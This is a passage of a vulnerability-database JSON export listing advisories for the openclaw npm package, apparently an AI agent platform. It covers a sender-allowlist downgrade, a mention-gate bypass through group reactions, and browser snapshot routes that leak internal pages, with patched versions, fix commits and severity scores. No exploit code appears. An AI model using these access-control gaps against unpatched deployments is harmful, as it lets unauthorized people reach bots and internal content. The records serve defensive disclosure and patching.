"vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-35626", "GHSA-rm59-992w-x2mv" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5s6h-u8x6-myfk" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90072?format=api", "vulnerability_id": "VCID-6849-th74-yqd5", "summary": "OpenClaw: Google Chat and Zalouser group sender allowlist bypass via policy downgrade\n## Summary\n\nWhen only a route-level group allowlist was configured, sender policy resolution silently downgraded from `allowlist` to `open` instead of preserving the configured group policy.\n\n## Impact\n\nAny member of an allowlisted Google Chat space or Zalouser group could interact with the bot even when the operator intended sender-level restrictions.\n\n## Affected Component\n\n`extensions/googlechat/src/monitor-access.ts, extensions/zalouser/src/monitor.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `e64a881ae0` (`Channels: preserve routed group policy`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33578", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01537", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01544", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02193", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33578" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/e64a881ae0fb8af18e451163f4c2d611d60cc8e4", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:25Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/e64a881ae0fb8af18e451163f4c2d611d60cc8e4" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-63mg-xp9j-jfcm", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:25Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-63mg-xp9j-jfcm" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33578", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33578" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-sender-policy-allowlist-bypass-via-policy-downgrade-in-google-chat-and-zalouser-extensions", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:25Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-sender-policy-allowlist-bypass-via-policy-downgrade-in-google-chat-and-zalouser-extensions" }, { "reference_url": "https://github.com/advisories/GHSA-63mg-xp9j-jfcm", "reference_id": "GHSA-63mg-xp9j-jfcm", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-63mg-xp9j-jfcm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-33578", "GHSA-63mg-xp9j-jfcm" ], "risk_score": 4.4, "exploitability": "0.5", "weighted_severity": "8.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6849-th74-yqd5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91053?format=api", "vulnerability_id": "VCID-6bxd-kbse-sudx", "summary": "OpenClaw: BlueBubbles Group Reactions Bypass requireMention and Still Enqueue Agent-Visible System Events\n## Summary\n\nBlueBubbles Group Reactions Bypass requireMention and Still Enqueue Agent-Visible System Events\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nBlueBubbles group reaction events previously bypassed `requireMention` and still enqueued agent-visible system events in groups that were supposed to stay mention-gated. Commit `f8c98630785288cc1f1d0893503ef3b653a3cede` applies the reaction path to the same mention gate as normal group messages.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `f8c98630785288cc1f1d0893503ef3b653a3cede`.\n\n## Fix Commit(s)\n\n- `f8c98630785288cc1f1d0893503ef3b653a3cede`", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/f8c98630785288cc1f1d0893503ef3b653a3cede", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/f8c98630785288cc1f1d0893503ef3b653a3cede" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mw7w-g3mg-xqm7", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mw7w-g3mg-xqm7" }, { "reference_url": "https://github.com/advisories/GHSA-mw7w-g3mg-xqm7", "reference_id": "GHSA-mw7w-g3mg-xqm7", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mw7w-g3mg-xqm7" } ], "fixed_packages": [], "aliases": [ "GHSA-mw7w-g3mg-xqm7" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6bxd-kbse-sudx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89059?format=api", "vulnerability_id": "VCID-6wth-qthz-yud8", "summary": "OpenClaw: Browser snapshot and screenshot routes could expose internal page content after navigation\n## Summary\n\nBrowser snapshot and screenshot routes could expose internal page content after navigation.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.14`\n- Patched versions: `>= 2026.4.14`\n\n## Impact\n\nAuthenticated browser tool callers could use snapshot, screenshot, or tab routes that did not consistently validate the final browser target after route-driven navigation. In restrictive browser SSRF configurations this could expose content from internal or otherwise disallowed pages.\n\n## Technical Details\n\nThe fix re-checks browser snapshot, screenshot, and tab route results against the configured browser SSRF policy before returning page content. Regression coverage was added around snapshot/screenshot and tab-route flows.\n\n## Fix\n\nThe issue was fixed in #66040. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `b75ad800a59009fc47eaa3471410f69046150e59`\n- PR: #66040\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42436", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.09041", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10552", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.1059", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42436" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/b75ad800a59009fc47eaa3471410f69046150e59", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:04Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/b75ad800a59009fc47eaa3471410f69046150e59" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/66040", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/66040" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-c4qm-58hj-j6pj", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:04Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-c4qm-58hj-j6pj" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42436", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": 